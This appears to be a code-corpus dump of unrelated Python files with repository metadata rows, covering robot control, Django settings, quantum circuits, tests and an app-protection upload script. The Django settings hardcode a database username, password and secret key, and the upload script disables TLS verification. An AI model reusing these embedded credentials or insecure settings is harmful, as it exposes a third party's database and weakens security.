# position minus the current joint setpoint.
with self._lock:
#self._joint_correction = q_desired - self._joint_setpoint_position_init
self._joint_correction = q_desired - q_setpoint
with self._lock:
data = self._create_xml_to_robot(self._joint_correction, ipoc)
print(data)
self._rsi_server.send(data)
else:
print("RSI Router: No connection with robot. Disconnecting all external connections!")
self._joint_setpoint_position_init = None
self._joint_correction = np.zeros(6).astype(np.float32)
self._ext_control_server.disconnect()
self._rsi_server.set_timeout(None)
self._ext_control_server.stop()
self._rsi_server.stop;
if __name__ == '__main__':
router = KUKARSIRouter()
router.run()
| 43.242754 | 130 | 0.600335 | [
"BSD-3-Clause"
] | adamleon/kuka | kuka_driver/src/kuka_driver/kuka_rsi_router.py | 11,935 | Python |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Northwestern University.
#
# Invenio-Vocabularies is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Subjects services."""
class SubjectsLabels:
"""Fetching of subjects labels for facets."""
def __call__(self, ids):
"""Return the mapping when evaluated.
In this case, the ids received are actually the vocabulary `scheme`
(top-level) and `subject` (nested). And since they are already
human-readable, we keep them as-is.
"""
unique_ids = list(set(ids))
return {id_: id_ for id_ in unique_ids}
| 28.958333 | 75 | 0.661871 | [
"MIT"
] | alejandromumo/invenio-vocabularies | invenio_vocabularies/contrib/subjects/facets.py | 695 | Python |
"""
Django settings for CoffeeAPI project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import urllib
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2z$9iq)q+$an2fm4gj271_*z-r#x86pcc976)^eh@8kuc*#@7h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CoffeeAPI.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CoffeeAPI.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'djongo',
"NAME": 'mongodb+srv://mohammed-mongo:[email protected]/test?retryWrites=true&w=majority'
}
}
"""
DATABASES = {
"default": {
"ENGINE": "djongo",
"CLIENT": {
"host": "mongodb+srv://mohammed-mongo:[email protected]/?retryWrites=true&w=majority",
"username": "mohammed-mongo",
"password": "iF7MzKLgXvgL57ve",
"name": "test",
"authMechanism": "SCRAM-SHA-1",
},
}}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| 26.367647 | 126 | 0.678751 | [
"MIT"
] | Mohammed-abdelawal/coffee_api | CoffeeAPI/CoffeeAPI/settings.py | 3,586 | Python |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/loot/quest/shared_nym_droid_memory_chip.iff"
result.attribute_template_id = -1
result.stfName("item_n","nym_memory_chip")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | 26.941176 | 80 | 0.731441 | [
"MIT"
] | SWGANHServices/GameServer_Legacy | data/scripts/templates/object/tangible/loot/quest/shared_nym_droid_memory_chip.py | 458 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet:
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
# Needs implementing!
# Tip: random.randint(min, max) can be used to generate random numbers
self._values = [random.randint(1, 6) for n in range(n)]
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(value >= 1 and value <= 6, "value " +
str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time,
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
# Roll two different instances of DiceSet and check that they both
# have any value
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
| 28.041096 | 78 | 0.618955 | [
"MIT"
] | benrki/python_koans | python3/koans/about_dice_project.py | 2,047 | Python |
#This file was originally generated by PyScripter's unitest wizard
import unittest
from coord import Coord
from cell import Cell
from field import Field
def dummy():
""" Dummy function for comparison of the return values """
return
class CoordTest(unittest.TestCase):
def setUp(self):
self.field = Field()
pass
def tearDown(self):
pass
def testMain(self):
self.coord = Coord()
assert self.coord.main() == dummy(), 'Gol01.get_size() does not provide the right return value'
def testCoordSavesItsCoordinates(self):
coord = Coord(4,5)
assert 4 == coord.x
assert 5 == coord.y
def testCreatedCellIsAlive(self):
coord1 = Coord(4,5)
cell = Cell(coord1)
assert cell.isAlive() == True, 'cell.status() does not provide the right return value'
def testCellKnowsIfItLivesInTheNextStep(self):
cell = Cell(Coord(4,5))
cell.nextStep(5)
assert False == cell.isAlive()
def addCell(self,x,y):
self.field.add(Cell(Coord(x, y)))
def fillExampleField(self):
self.addCell(1,1)
self.addCell(1,2)
self.addCell(2,1)
def testFieldIsWellCreated(self):
self.fillExampleField()
assert self.field.getNumberOfLivingCells() == 3, 'field.numberOfAliveCells does not provide the right return value'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| 27.416667 | 124 | 0.616413 | [
"Apache-2.0"
] | hemmerling/codingdojo | src/game_of_life/python_coderetreat_socramob/cr_socramob08/coord_test.py | 1,645 | Python |
# Copyright 2018 HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from pathlib import Path
from copy import copy
import pytest
import htmap
from htmap.settings import BASE_SETTINGS
from htmap._startup import ensure_htmap_dir_exists
# start with base settings (ignore user settings for tests)
htmap.settings.replace(BASE_SETTINGS)
htmap.settings[
"DELIVERY_METHOD"
] = "shared" # shared is the default for all tests that aren't parametric
htmap.settings["WAIT_TIME"] = 0.1
htmap.settings["MAP_OPTIONS.request_memory"] = "10MB"
htmap.settings["MAP_OPTIONS.keep_claim_idle"] = "1"
SETTINGS = copy(htmap.settings)
@pytest.fixture(scope="function", autouse=True)
def reset_settings():
htmap.settings.replace(SETTINGS)
@pytest.fixture(scope="function", autouse=True)
def set_transplant_dir(tmpdir_factory, reset_settings):
path = Path(tmpdir_factory.mktemp("htmap_transplant_dir"))
htmap.settings["TRANSPLANT.DIR"] = path
@pytest.fixture(scope="function")
def delivery_methods(delivery_method, reset_settings):
htmap.settings["DELIVERY_METHOD"] = delivery_method
def pytest_addoption(parser):
parser.addoption(
"--delivery",
nargs="+",
default=["shared"], # shared is the default for parametric delivery testing
)
def pytest_generate_tests(metafunc):
if "delivery_methods" in metafunc.fixturenames:
metafunc.parametrize(
"delivery_method", metafunc.config.getoption("delivery"),
)
@pytest.fixture(scope="function", autouse=True)
def set_htmap_dir_and_clean(tmpdir_factory):
map_dir = Path(tmpdir_factory.mktemp("htmap_dir"))
htmap.settings["HTMAP_DIR"] = map_dir
ensure_htmap_dir_exists()
yield
htmap.clean(all=True)
@pytest.fixture(scope="session")
def doubler():
def doubler(x):
return 2 * x
return doubler
@pytest.fixture(scope="session")
def mapped_doubler(doubler):
mapper = htmap.mapped(doubler)
return mapper
@pytest.fixture(scope="session")
def power():
def power(x=0, p=2):
return x ** p
return power
@pytest.fixture(scope="session")
def mapped_power(power):
mapper = htmap.mapped(power)
return mapper
@pytest.fixture(scope="session")
def never_returns():
def never(_):
while True:
time.sleep(1)
return never
@pytest.fixture(scope="function")
def map_that_never_finishes(never_returns):
m = htmap.map(never_returns, [None])
yield m
m.remove()
@pytest.fixture(scope="session")
def mapped_exception():
@htmap.mapped
def fail(x):
raise Exception(str(x))
return fail
def exception_msg(exc_info) -> str:
return str(exc_info.value)
| 23.941606 | 84 | 0.721341 | [
"Apache-2.0"
] | elin1231/htmap | tests/conftest.py | 3,280 | Python |
# qubit number=5
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.cx(input_qubit[4],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=36
prog.cz(input_qubit[4],input_qubit[0]) # number=37
prog.h(input_qubit[0]) # number=38
prog.z(input_qubit[4]) # number=34
prog.cx(input_qubit[4],input_qubit[0]) # number=35
prog.cx(input_qubit[4],input_qubit[0]) # number=32
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[1],input_qubit[2]) # number=39
prog.h(input_qubit[3]) # number=8
prog.x(input_qubit[0]) # number=9
prog.x(input_qubit[1]) # number=10
prog.cx(input_qubit[0],input_qubit[2]) # number=22
prog.x(input_qubit[2]) # number=23
prog.cx(input_qubit[0],input_qubit[2]) # number=24
prog.cx(input_qubit[0],input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=26
prog.cx(input_qubit[0],input_qubit[3]) # number=27
prog.y(input_qubit[2]) # number=29
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit843.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 30.434109 | 82 | 0.610036 | [
"BSD-3-Clause"
] | UCLA-SEAL/QDiff | benchmark/startQiskit843.py | 3,926 | Python |
default_app_config = 'eleprofile.apps.EleprofileConfig' | 55 | 55 | 0.872727 | [
"MPL-2.0"
] | dmiolo/g3w-admin-elevation-profile | __init__.py | 55 | Python |
# Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of patron."""
import copy
from keystoneclient import auth
from keystoneclient import service_catalog
from oslo_context import context
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from patron import exception
from patron.i18n import _, _LW
from patron import policy
LOG = logging.getLogger(__name__)
class _ContextAuthPlugin(auth.BaseAuthPlugin):
"""A keystoneclient auth plugin that uses the values from the Context.
Ideally we would use the plugin provided by auth_token middleware however
this plugin isn't serialized yet so we construct one from the serialized
auth data.
"""
def __init__(self, auth_token, sc):
super(_ContextAuthPlugin, self).__init__()
self.auth_token = auth_token
sc = {'serviceCatalog': sc}
self.service_catalog = service_catalog.ServiceCatalogV2(sc)
def get_token(self, *args, **kwargs):
return self.auth_token
def get_endpoint(self, session, service_type=None, interface=None,
region_name=None, service_name=None, **kwargs):
return self.service_catalog.url_for(service_type=service_type,
service_name=service_name,
endpoint_type=interface,
region_name=region_name)
class RequestContext(context.RequestContext):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id=None, project_id=None,
is_admin=None, read_deleted="no",
roles=None, remote_address=None, timestamp=None,
request_id=None, auth_token=None, overwrite=True,
quota_class=None, user_name=None, project_name=None,
service_catalog=None, instance_lock_checked=False,
user_auth_plugin=None, **kwargs):
""":param read_deleted: 'no' indicates deleted records are hidden,
'yes' indicates deleted records are visible,
'only' indicates that *only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param user_auth_plugin: The auth plugin for the current request's
authentication data.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
user = kwargs.pop('user', None)
tenant = kwargs.pop('tenant', None)
super(RequestContext, self).__init__(
auth_token=auth_token,
user=user_id or user,
tenant=project_id or tenant,
domain=kwargs.pop('domain', None),
user_domain=kwargs.pop('user_domain', None),
project_domain=kwargs.pop('project_domain', None),
is_admin=is_admin,
read_only=kwargs.pop('read_only', False),
show_deleted=kwargs.pop('show_deleted', False),
request_id=request_id,
resource_uuid=kwargs.pop('resource_uuid', None),
overwrite=overwrite)
# oslo_context's RequestContext.to_dict() generates this field, we can
# safely ignore this as we don't use it.
kwargs.pop('user_identity', None)
if kwargs:
LOG.warning(_LW('Arguments dropped when creating context: %s') %
str(kwargs))
# FIXME(dims): user_id and project_id duplicate information that is
# already present in the oslo_context's RequestContext. We need to
# get rid of them.
self.user_id = user_id
self.project_id = project_id
self.roles = roles or []
self.read_deleted = read_deleted
self.remote_address = remote_address
if not timestamp:
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
if service_catalog:
# Only include required parts of service_catalog
self.service_catalog = [s for s in service_catalog
if s.get('type') in ('volume', 'volumev2', 'key-manager')]
else:
# if list is empty or none
self.service_catalog = []
self.instance_lock_checked = instance_lock_checked
# NOTE(markmc): this attribute is currently only used by the
# rs_limits turnstile pre-processor.
# See https://lists.launchpad.net/openstack/msg12200.html
self.quota_class = quota_class
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
self.user_auth_plugin = user_auth_plugin
if self.is_admin is None:
self.is_admin = policy.check_is_admin(self)
def get_auth_plugin(self):
if self.user_auth_plugin:
return self.user_auth_plugin
else:
return _ContextAuthPlugin(self.auth_token, self.service_catalog)
def _get_read_deleted(self):
return self._read_deleted
def _set_read_deleted(self, read_deleted):
if read_deleted not in ('no', 'yes', 'only'):
raise ValueError(_("read_deleted can only be one of 'no', "
"'yes' or 'only', not %r") % read_deleted)
self._read_deleted = read_deleted
def _del_read_deleted(self):
del self._read_deleted
read_deleted = property(_get_read_deleted, _set_read_deleted,
_del_read_deleted)
def to_dict(self):
values = super(RequestContext, self).to_dict()
# FIXME(dims): defensive hasattr() checks need to be
# removed once we figure out why we are seeing stack
# traces
values.update({
'user_id': getattr(self, 'user_id', None),
'project_id': getattr(self, 'project_id', None),
'is_admin': getattr(self, 'is_admin', None),
'read_deleted': getattr(self, 'read_deleted', 'no'),
'roles': getattr(self, 'roles', None),
'remote_address': getattr(self, 'remote_address', None),
'timestamp': timeutils.strtime(self.timestamp) if hasattr(
self, 'timestamp') else None,
'request_id': getattr(self, 'request_id', None),
'quota_class': getattr(self, 'quota_class', None),
'user_name': getattr(self, 'user_name', None),
'service_catalog': getattr(self, 'service_catalog', None),
'project_name': getattr(self, 'project_name', None),
'instance_lock_checked': getattr(self, 'instance_lock_checked',
False)
})
return values
@classmethod
def from_dict(cls, values):
return cls(**values)
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
context = copy.deepcopy(self)
context.is_admin = True
if 'admin' not in context.roles:
context.roles.append('admin')
if read_deleted is not None:
context.read_deleted = read_deleted
return context
def __str__(self):
return "<Context %s>" % self.to_dict()
def get_admin_context(read_deleted="no"):
return RequestContext(user_id=None,
project_id=None,
is_admin=True,
read_deleted=read_deleted,
overwrite=False)
def is_user_context(context):
"""Indicates if the request context is a normal user."""
if not context:
return False
if context.is_admin:
return False
if not context.user_id or not context.project_id:
return False
return True
def require_admin_context(ctxt):
"""Raise exception.AdminRequired() if context is an admin context."""
if not ctxt.is_admin:
raise exception.AdminRequired()
def require_context(ctxt):
"""Raise exception.Forbidden() if context is not a user or an
admin context.
"""
if not ctxt.is_admin and not is_user_context(ctxt):
raise exception.Forbidden()
def authorize_project_context(context, project_id):
"""Ensures a request has permission to access the given project."""
if is_user_context(context):
if not context.project_id:
raise exception.Forbidden()
elif context.project_id != project_id:
raise exception.Forbidden()
def authorize_user_context(context, user_id):
"""Ensures a request has permission to access the given user."""
if is_user_context(context):
if not context.user_id:
raise exception.Forbidden()
elif context.user_id != user_id:
raise exception.Forbidden()
def authorize_quota_class_context(context, class_name):
"""Ensures a request has permission to access the given quota class."""
if is_user_context(context):
if not context.quota_class:
raise exception.Forbidden()
elif context.quota_class != class_name:
raise exception.Forbidden()
| 37.619926 | 78 | 0.638254 | [
"Apache-2.0"
] | casbin/openstack-patron | patron/context.py | 10,195 | Python |
import os
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
def make_trainable(net, val):
net.trainable = val
for layer in net.layers:
layer.trainable = val
def plot_loss(losses):
plt.figure(figsize=(10, 8))
plt.plot(losses['g'], label='generative loss')
plt.plot(losses['d'], label='discriminitive loss')
plt.legend()
plt.show()
def render_bboxes(bboxes_batch, labels_batch, shape):
renders = []
for i in range(len(bboxes_batch)):
bboxes = bboxes_batch[i]
labels = labels_batch[i]
canvas = np.zeros(shape, dtype=np.float32)
canvas += 255
for j in range(len(bboxes)):
bbox = bboxes[j]
top, left, bottom, right = bbox
label = labels[j]
color = (np.where(label==1)[0][0] + 1) * 10
canvas[top:bottom, left:right, 0] = color
canvas /= 255
renders.append(canvas)
return np.array(renders)
def save_batch(images, epoch, path, suffix=''):
samples_path = os.path.join(path, 'samples')
if not os.path.exists(samples_path):
os.makedirs(samples_path)
num_images = images.shape[0]
num_rows = images.shape[1]
num_cols = images.shape[2]
canvas = np.zeros((num_rows, num_images * num_cols, 1), dtype=images.dtype)
for i in range(num_images):
canvas[0:num_rows, i * num_cols:(i + 1) * num_cols] = images[i]
img = canvas
img *= 255
img = Image.fromarray(np.squeeze(img))
img = img.convert('L')
img.save(samples_path + f'/{epoch}_{suffix}.png')
def load_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.load_weights(model_path)
def save_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.save_weights(model_path)
| 25.513889 | 79 | 0.623299 | [
"MIT"
] | lukamaletin/multi-gan | src/util.py | 1,837 | Python |
# Generated by Django 3.2.5 on 2021-11-29 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("organisations", "0004_auto_20210718_1147"),
("schools", "0005_alter_school_courses_offered"),
]
operations = [
migrations.AlterField(
model_name="school",
name="courses_offered",
field=models.ManyToManyField(
blank=True,
related_name="schools",
related_query_name="schools",
to="organisations.Course",
verbose_name="courses",
),
),
]
| 25.461538 | 57 | 0.563444 | [
"MIT"
] | JobDoesburg/PUC-admin | pucadmin/schools/migrations/0006_alter_school_courses_offered.py | 662 | Python |
from django.conf.urls import patterns, url
urlpatterns = patterns('wouso.interface.apps.files.cpanel_views',
url(r'^$', 'files', name='files'),
url(r'^add_file/$', 'add_file', name='add_file'),
url(r'^edit_file/(?P<pk>\d+)/$', 'edit_file', name='edit_file'),
url(r'^delete_file/(?P<pk>\d+)/$', 'delete_file', name='delete_file'),
url(r'^manage_categories/$', 'manage_categories', name='manage_file_categories'),
url(r'^add_category/$', 'add_category', name='add_file_category'),
url(r'^edit_category/(?P<pk>\d+)/$', 'edit_category', name='edit_file_category'),
url(r'^delete_category/(?P<pk>\d+)/$', 'delete_category', name='delete_file_category'),
)
| 52.615385 | 91 | 0.663743 | [
"Apache-2.0"
] | AlexandruGhergut/wouso | wouso/interface/apps/files/cpanel_urls.py | 684 | Python |
# Generated by Django 3.0 on 2020-10-19 06:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20200922_1738'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 23.368421 | 108 | 0.628378 | [
"MIT"
] | Dev-Mehta/AskaDev | accounts/migrations/0004_auto_20201019_1200.py | 444 | Python |
import torch
from torch import nn
from torch.nn import init
import torch.nn.functional as F
class SCNN(nn.Module):
def __init__(self, in_channels, n_classes):
super(SCNN, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels, out_channels=16, kernel_size=3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
)
self.conv2 = nn.Sequential(
nn.Conv2d(16, out_channels=32, kernel_size=3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
)
self.conv3 = nn.Sequential(
nn.Conv2d(32, out_channels=64, kernel_size=3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
)
self.fc = nn.Sequential(
nn.Linear(43264, 4096),
nn.BatchNorm1d(4096),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(4096, 512),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(512, n_classes),
)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
class Classifier(nn.Module):
def __init__(self, in_channels, n_classes):
super(Classifier, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(in_channels, 1024),
nn.BatchNorm1d(1024),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(1024, 512),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(512, n_classes),
# nn.Softmax(dim=1)
)
self._init_weight()
def forward(self, x):
x = self.avg_pool(x)
x = torch.flatten(x, 1)
out = self.fc(x)
return out
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0) | 30.153846 | 67 | 0.519983 | [
"MIT"
] | haifangong/TNSC-classification-baseline | model/classifier.py | 2,352 | Python |
#
# Copyright 2021 XEBIALABS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import json
import requests
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("Arxan")
# New ARXAN logic
# setup the request url
api_token_endpoint = "/v2/apaas/apps"
url = server.get('url') + "%s" % api_token_endpoint
headers = {
'Content-Type': "application/x-www-form-urlencoded"
}
with open(file_path, 'rb') as app_file:
logger.info('Filepath: %s' % file_path)
files = {'appFile': app_file}
headers = {
'Authorization': auth_string,
}
data = {
'productId' : 'Essential Protection',
'protection': {
'appAware': {
'applicationToken': server.get('app_token'),
'endpoint': server.get('app_endpoint')
}
}
}
logger.info('Uploading file...')
logger.info('URL: %s' % url)
logger.info('Headers: %s' % json.dumps(headers))
logger.info('JSON: %s' % json.dumps(data))
response = requests.post(url, files = files, data = {'data': json.dumps(data)}, headers = headers, verify = False)
logger.info('Uploading app response status code: %s.' % response.status_code)
logger.info(response.json()['message'])
# output = response.json().get('protectionId')
if response.status_code == 200:
logger.info('App uploaded')
json_response = response.json()
logger.debug('App upload response: %s', json_response)
if 'protectionId' not in json_response:
logger.error('There was a problem uploading the app. Missing protectionId in the response')
else:
protection_id = json_response['protectionId']
logger.debug('App protection id is %s', protection_id)
output = protection_id
elif response.status_code == 400:
error_message = response.json()['message']
logger.error('There was a problem protecting %s', error_message)
elif response.status_code == 401 or response.status_code == 403:
raise AuthorizationError()
elif response.status_code == 404:
logger.error('Cannot reach server %s', server)
else:
logger.error('An unexpected error has occurred. (%d)', response.status_code)
raise Exception('Incorrect response code for upload app: (%s)', response.status_code) | 48.362319 | 462 | 0.69104 | [
"MIT"
] | xebialabs-community/xlr-essential-app-protection-plugin | build/resources/main/arxan/UploadApplication.py | 3,337 | Python |
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Python implementation of the GRPC helloworld.Greeter client."""
from __future__ import print_function
import logging
from urllib import response
from vinte_um import Jogador, VinteUm
import grpc
import helloworld_pb2
import helloworld_pb2_grpc
import time
import redis
